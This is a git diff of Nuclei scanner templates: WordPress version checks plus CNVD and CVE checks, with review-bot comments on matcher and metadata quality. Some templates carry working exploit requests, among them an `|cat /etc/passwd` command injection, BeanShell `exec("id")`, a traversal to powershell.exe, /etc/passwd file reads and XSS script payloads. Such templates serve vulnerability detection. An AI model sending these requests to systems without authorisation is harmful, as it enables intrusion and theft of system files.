+ shodan-query: 'vuln:CVE-2024-5613'
+ tags: cve,wordpress,wp-theme,formula,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/formula/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "formula"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5638.yaml b/poc/cve/CVE-2024-5638.yaml
new file mode 100644
index 0000000000..7747dee395
--- /dev/null
+++ b/poc/cve/CVE-2024-5638.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5638
+
+info:
+ name: >
+ Formula <= 0.5.1 - Reflected Cross-Site Scripting via ti_customizer_notify_dismiss_recommended_plugins
+ author: topscoder
+ severity: medium
+ description: >
+ The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'ti_customizer_notify_dismiss_recommended_plugins' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/193eeb92-f0af-4c6a-ac44-3166023a3006?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-5638
+ metadata:
+ fofa-query: "wp-content/themes/formula/"
+ google-query: inurl:"/wp-content/themes/formula/"
+ shodan-query: 'vuln:CVE-2024-5638'
+ tags: cve,wordpress,wp-theme,formula,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/formula/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "formula"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5654.yaml b/poc/cve/CVE-2024-5654.yaml
new file mode 100644
index 0000000000..c976d4f62b
--- /dev/null
+++ b/poc/cve/CVE-2024-5654.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5654
+
+info:
+ name: >
+ CF7 Google Sheets Connector <= 5.0.9 - Missing Authorization to Limited Site Configuration Update
+ author: topscoder
+ severity: high
+ description: >
+ The CF7 Google Sheets Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'execute_post_data_cg7_free' function in all versions up to, and including, 5.0.9. This makes it possible for unauthenticated attackers to toggle site configuration settings, including WP_DEBUG, WP_DEBUG_LOG, SCRIPT_DEBUG, and SAVEQUERIES.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c0da4d55-5025-47cf-9f45-377d8943fc94?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-5654
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-google-sheets-connector/"
+ google-query: inurl:"/wp-content/plugins/cf7-google-sheets-connector/"
+ shodan-query: 'vuln:CVE-2024-5654'
+ tags: cve,wordpress,wp-plugin,cf7-google-sheets-connector,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-google-sheets-connector/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-google-sheets-connector"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5663.yaml b/poc/cve/CVE-2024-5663.yaml
new file mode 100644
index 0000000000..fdf3f26b96
--- /dev/null
+++ b/poc/cve/CVE-2024-5663.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5663
+
+info:
+ name: >
+ Cards for Beaver Builder <= 1.1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Cards Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Cards widget in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/55ff923e-9d04-4ce7-b6d6-165fa4fc5433?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5663
+ metadata:
+ fofa-query: "wp-content/plugins/bb-bootstrap-cards/"
+ google-query: inurl:"/wp-content/plugins/bb-bootstrap-cards/"
+ shodan-query: 'vuln:CVE-2024-5663'
+ tags: cve,wordpress,wp-plugin,bb-bootstrap-cards,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bb-bootstrap-cards/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bb-bootstrap-cards"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5758.yaml b/poc/cve/CVE-2024-5758.yaml
new file mode 100644
index 0000000000..ca096c630a
--- /dev/null
+++ b/poc/cve/CVE-2024-5758.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5758
+
+info:
+ name: >
+ Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX <= 4.0.4 - Authenticated (Contributor+) Stored Cross=Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the filterMobileText parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dcc3f47-8504-4aa6-af60-03edeaa39fd7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5758
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-post/"
+ google-query: inurl:"/wp-content/plugins/ultimate-post/"
+ shodan-query: 'vuln:CVE-2024-5758'
+ tags: cve,wordpress,wp-plugin,ultimate-post,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-post/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-post"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml b/poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml
new file mode 100644
index 0000000000..2c0e9068db
--- /dev/null
+++ b/poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4
+
+info:
+ name: >
+ WP Force SSL & HTTPS SSL Redirect <= 1.66 - Missing Authorization to Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 4.2
+ cve-id: CVE-2024-5770
+ metadata:
+ fofa-query: "wp-content/plugins/wp-force-ssl/"
+ google-query: inurl:"/wp-content/plugins/wp-force-ssl/"
+ shodan-query: 'vuln:CVE-2024-5770'
+ tags: cve,wordpress,wp-plugin,wp-force-ssl,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-force-ssl/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-force-ssl"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.66')
\ No newline at end of file
diff --git a/poc/cve/cnvd-2018-13393-1037.yaml b/poc/cve/cnvd-2018-13393-1037.yaml index f215ee7764..0fd90a4a1c 100644 --- a/poc/cve/cnvd-2018-13393-1037.yaml +++ b/poc/cve/cnvd-2018-13393-1037.yaml @@ -1,16 +1,10 @@ id: CNVD-2018-13393 info: - name: Metinfo - Local File Inclusion + name: Metinfo LFI author: ritikchaddha severity: high - description: Metinfo is susceptible to local file inclusion. - reference: - - https://paper.seebug.org/676/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 + reference: https://paper.seebug.org/676/ tags: metinfo,cnvd,cvnd2018,lfi requests: @@ -28,5 +22,3 @@ requests: - "(.*?)" - - "(.*?)" - condition: and - - type: status - status: - - 200 diff --git a/poc/cve/cnvd-2021-10543-1086.yaml b/poc/cve/cnvd-2021-10543-1086.yaml index 6f3f3af8f2..9a531cec67 100644 --- a/poc/cve/cnvd-2021-10543-1086.yaml +++ b/poc/cve/cnvd-2021-10543-1086.yaml @@ -1,17 +1,14 @@ id: CNVD-2021-10543 - info: name: EEA Information Disclosure author: pikpikcu severity: high reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure,cnvd,cnvd2021 - + tags: config,exposure,cnvd requests: - method: GET path: - "{{BaseURL}}/authenticationserverservlet" - matchers-condition: and matchers: - type: regex @@ -19,7 +16,6 @@ requests: - "(.*?)" - "(.*?)" condition: and - - type: status status: - 200 diff --git a/poc/cve/cnvd-2021-14536-1088.yaml b/poc/cve/cnvd-2021-14536-1087.yaml similarity index 100% rename from poc/cve/cnvd-2021-14536-1088.yaml rename to poc/cve/cnvd-2021-14536-1087.yaml diff --git a/poc/cve/cnvd-2021-15822-1089.yaml b/poc/cve/cnvd-2021-15822-1089.yaml deleted file mode 100644 index 2f90f49d59..0000000000 --- a/poc/cve/cnvd-2021-15822-1089.yaml +++ /dev/null 
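Review bot: The second hunk of `cnvd-2018-13393-1037.yaml` (`@@ -28,5 +22,3 @@`) removes the `status: 200` matcher, leaving the regex matcher as the only visible condition, so an error or redirect body that happens to satisfy the patterns would be reported as a finding. I would keep the three lines `- type: status`, `status:` and `- 200` under a `matchers-condition: and`. The first hunk also drops `description` and the `classification` block (CVSS 8.6, CWE-22), which removes the context a triager relies on. The regex patterns display as `(.*?)` here, which looks like markup lost in rendering, and the start of the `matchers` section is outside the hunk, so both should be checked against the file.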
@@ -1,27 +0,0 @@ -id: CNVD-2021-15822 - -info: - name: ShopXO Download File Read - author: pikpikcu - severity: high - reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - tags: shopxo,lfi - -requests: - - raw: - - | - GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cnvd-2021-15822-1093.yaml b/poc/cve/cnvd-2021-15822-1093.yaml new file mode 100644 index 0000000000..761c3109f5 --- /dev/null +++ b/poc/cve/cnvd-2021-15822-1093.yaml @@ -0,0 +1,22 @@ +id: CNVD-2021-15822 +info: + name: ShopXO Download File Read + author: pikpikcu + severity: high + reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + tags: shopxo,lfi +requests: + - raw: + - | + GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cnvd-2021-15822-1095.yaml b/poc/cve/cnvd-2021-15822-1095.yaml index 761c3109f5..8b8f8eba47 100644 --- a/poc/cve/cnvd-2021-15822-1095.yaml +++ b/poc/cve/cnvd-2021-15822-1095.yaml 
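Review bot: In the new `cnvd-2021-15822-1093.yaml` the regex `root:.*:0:0` is looser than the `root:[x*]:0:0` of the file it replaces: `.*` is greedy and the pattern has no trailing colon, so any body containing `root:` followed later on the same line by `:0:0` counts as a match. Suggest `- "root:[x*]:0:0:"`, which keeps the password-field check and closes the GID field. The template is also added without `description` or `classification`, so a hit carries no explanation for whoever triages it.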
@@ -4,19 +4,20 @@ info: author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - tags: shopxo,lfi + tags: shopxo,lfi,cnvd,cnvd2021 requests: - raw: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/17 diff --git a/poc/cve/cnvd-2021-15824-1096.yaml b/poc/cve/cnvd-2021-15824-1097.yaml similarity index 100% rename from poc/cve/cnvd-2021-15824-1096.yaml rename to poc/cve/cnvd-2021-15824-1097.yaml diff --git a/poc/cve/cnvd-2021-17369-1102.yaml b/poc/cve/cnvd-2021-17369-1102.yaml index 43487027d3..367ab1a950 100644 --- a/poc/cve/cnvd-2021-17369-1102.yaml +++ b/poc/cve/cnvd-2021-17369-1102.yaml @@ -2,14 +2,8 @@ id: CNVD-2021-17369 info: name: Ruijie Smartweb Management System Password Information Disclosure author: pikpikcu - severity: high - description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege. - reference: - - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + severity: medium + reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 tags: ruijie,disclosure,cnvd,cnvd2021 requests: - method: GET @@ -28,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/16 diff --git a/poc/cve/cnvd-2021-26422-1103.yaml b/poc/cve/cnvd-2021-26422-1103.yaml deleted file mode 100644 index 33197c44fe..0000000000 --- a/poc/cve/cnvd-2021-26422-1103.yaml +++ /dev/null 
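Review bot: In `cnvd-2021-17369-1102.yaml` the rating becomes `severity: medium` while the same hunk deletes the description and the classification that supported the earlier value (CVSS 8.3, CWE-522), so the new severity has no stated basis. For a template named "Password Information Disclosure" I would keep `severity: high`, or add a `description` that explains why medium is correct. The list-style `reference:` and the `classification` block are worth keeping either way, since they are what result consumers use to prioritise.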
@@ -1,38 +0,0 @@ -id: CNVD-2021-26422 - -info: - name: eYouMail - Remote Code Execution - author: daffainfo - severity: critical - description: eYouMail is susceptible to a remote code execution vulnerability. - reference: - - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py - - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-77 - metadata: - max-request: 1 - tags: eyoumail,rce,cnvd,cnvd2021 - -http: - - raw: - - | - POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - type='|cat /etc/passwd||' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# digest: 490a0046304402201ee36adf50f32ae67f64599b94d2b9dfa6a4a0094adc93f90ecab288cecc93290220254600764abc5267785430750c6f77bf40fe664896993a2fbcc0d779fc106ae8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cnvd-2021-28277-1105.yaml b/poc/cve/cnvd-2021-28277-1105.yaml new file mode 100644 index 0000000000..cbb2bb479f --- /dev/null +++ b/poc/cve/cnvd-2021-28277-1105.yaml 
@@ -0,0 +1,51 @@ +id: CNVD-2021-28277 + +info: + name: Landray-OA - Local File Inclusion + author: pikpikcu,daffainfo + severity: high + description: Landray-OA is susceptible to local file inclusion. + reference: + - https://www.aisoutu.com/a/1432457 + - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + metadata: + max-request: 2 + fofa-query: app="Landray OA system" + tags: landray,lfi,cnvd,cnvd2021 + +http: + - raw: + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"file:///etc/passwd"}} + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"file:///c://windows/win.ini"}} + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 + +# digest: 4a0a00473045022055ed57d6d24038e0c53a5a301192831ea1e2e562ada51eb178e08549e021db68022100d4c9e7513264a6ece808bd569d4d15d300d55b554bbf98f7016c1ab36c5e19e3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cnvd-2021-28277-1107.yaml b/poc/cve/cnvd-2021-28277-1107.yaml index 5be02217e6..51f36fbda2 100644 --- a/poc/cve/cnvd-2021-28277-1107.yaml +++ b/poc/cve/cnvd-2021-28277-1107.yaml @@ -1,7 +1,6 @@ id: CNVD-2021-28277 - info: - name: Landray-OA Arbitrary File Download + name: Landray-OA Arbitrary - Arbitrary File Retrieval author: pikpikcu,daffainfo severity: high reference: @@ -10,7 +9,6 @@ info: metadata: fofa-query: app="Landray OA system" tags: landray,lfi,cnvd,cnvd2021 - requests: - raw: - | 
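Review bot: The new name in `cnvd-2021-28277-1107.yaml`, `Landray-OA Arbitrary - Arbitrary File Retrieval`, repeats "Arbitrary"; `name: Landray-OA - Arbitrary File Retrieval` reads correctly and follows the `Product - Issue` form used by `cnvd-2021-28277-1105.yaml` in this commit. As far as the hunks show, this file still has no `description` or `classification`, which the 1105 copy of the same check does provide.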
@@ -20,7 +18,6 @@ requests: Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} - - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} @@ -28,17 +25,14 @@ requests: Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///c://windows/win.ini"}} - stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/cve/cnvd-2021-30167-1108.yaml b/poc/cve/cnvd-2021-30167-1108.yaml deleted file mode 100644 index ed9600b3a9..0000000000 --- a/poc/cve/cnvd-2021-30167-1108.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CNVD-2021-30167 -info: - name: UFIDA NC BeanShell Remote Code Execution - author: pikpikcu - severity: high - reference: - - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - - https://www.cnvd.org.cn/webinfo/show/6491 - tags: beanshell,rce,cnvd,cnvd2021 -requests: - - raw: - - | #linux - POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - bsh.script=exec("id"); - - | #windows - POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - bsh.script=exec("ipconfig"); - matchers-condition: and - matchers: - - type: regex - regex: - - "uid=" - - "Windows IP" - condition: or - - type: word - words: - - "BeanShell Test Servlet" - - type: status - status: - - 200 diff --git a/poc/cve/cnvd-2021-49104-1113.yaml b/poc/cve/cnvd-2021-49104-1114.yaml similarity index 100% rename from poc/cve/cnvd-2021-49104-1113.yaml rename to poc/cve/cnvd-2021-49104-1114.yaml diff --git a/poc/cve/cnvd-2022-03672-1116.yaml b/poc/cve/cnvd-2022-03672-1116.yaml new file mode 100644 index 0000000000..400f7dc2ad --- /dev/null +++ b/poc/cve/cnvd-2022-03672-1116.yaml 
@@ -0,0 +1,42 @@ +id: CNVD-2022-03672 + +info: + name: Sunflower Simple and Personal edition RCE + author: daffainfo + severity: critical + reference: + - https://www.1024sou.com/article/741374.html + - https://copyfuture.com/blogs-details/202202192249158884 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 + tags: cnvd,cnvd2020,sunflower,rce + +requests: + - raw: + - | + POST /cgi-bin/rpc HTTP/1.1 + Host: {{Hostname}} + + action=verify-haras + - | + GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 + Host: {{Hostname}} + Cookie: CID={{cid}} + + extractors: + - type: regex + name: cid + internal: true + group: 1 + regex: + - '"verify_string":"(.*)"' + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1==200" + - "status_code_2==200" + - "contains(body_1, 'verify_string')" + - "contains(body_2, 'Windows IP')" + condition: and diff --git a/poc/cve/cnvd-2022-03672-1117.yaml b/poc/cve/cnvd-2022-03672-1117.yaml deleted file mode 100644 index b96b1bebfe..0000000000 --- a/poc/cve/cnvd-2022-03672-1117.yaml +++ /dev/null 
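Review bot: The `tags` line carries `cnvd2020` although the id is CNVD-2022-03672, so a run that selects templates by the year tag would skip this one; it should read `tags: cnvd,cnvd2022,sunflower,rce`. The file is also added without `description` or `classification`, which the `cnvd-2022-03672-1117.yaml` deleted in this commit had (CVSS 10.0, CWE-77); carrying those over keeps the critical rating explained.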
@@ -1,45 +0,0 @@ -id: CNVD-2022-03672 -info: - name: Sunflower Simple and Personal - Remote Code Execution - author: daffainfo - severity: critical - description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. - reference: - - https://www.1024sou.com/article/741374.html - - https://copyfuture.com/blogs-details/202202192249158884 - - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: cnvd,cnvd2020,sunflower,rce -requests: - - raw: - - | - POST /cgi-bin/rpc HTTP/1.1 - Host: {{Hostname}} - - action=verify-haras - - | - GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 - Host: {{Hostname}} - Cookie: CID={{cid}} - extractors: - - type: regex - name: cid - internal: true - group: 1 - regex: - - '"verify_string":"(.*)"' - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1==200" - - "status_code_2==200" - - "contains(body_1, 'verify_string')" - - "contains(body_2, 'Windows IP')" - condition: and - -# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/cve-2000-0114-1297.yaml b/poc/cve/cve-2000-0114-1297.yaml new file mode 100644 index 0000000000..0050d0c90c --- /dev/null +++ b/poc/cve/cve-2000-0114-1297.yaml 
@@ -0,0 +1,32 @@
+id: CVE-2000-0114
+
+info:
+ name: Microsoft FrontPage Extensions Check (shtml.dll)
+ author: r3naissance
+ severity: low
+ description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
+ - https://www.exploit-db.com/exploits/19897
+ classification:
+ cve-id: CVE-2000-0114
+ remediation: Upgrade to the latest version.
+ tags: cve,cve2000,frontpage,microsoft
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/_vti_inf.html'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "_vti_bin/shtml.dll"
+
+# Enhanced by mp on 2022/01/27
diff --git a/poc/cve/cve-2002-1131-1304.yaml b/poc/cve/cve-2002-1131-1304.yaml
new file mode 100644
index 0000000000..676bc984a7
--- /dev/null
+++ b/poc/cve/cve-2002-1131-1304.yaml
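Review bot: The matchers only confirm that `/_vti_inf.html` answers 200 and mentions `_vti_bin/shtml.dll`, which shows that FrontPage Server Extensions are exposed but not that the anonymous account name can be read as the `description` states. A hit should therefore be triaged as exposure of the extensions, and the description would be more accurate if it said that the template checks for their presence. `remediation: Upgrade to the latest version.` does not name what to upgrade; wording such as `remediation: Remove or disable FrontPage Server Extensions, or restrict access to /_vti_bin/.` would give the operator an action.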
@@ -0,0 +1,43 @@
+id: CVE-2002-1131
+
+info:
+ name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
+ author: dhiyaneshDk
+ severity: medium
+ description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+ reference:
+ - http://www.redhat.com/support/errata/RHSA-2002-204.html
+ - http://www.debian.org/security/2002/dsa-191
+ - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
+ - https://www.exploit-db.com/exploits/21811
+ - https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
+ - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
+ classification:
+ cve-id: CVE-2002-1131
+ tags: xss,squirrelmail,cve,cve2002
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
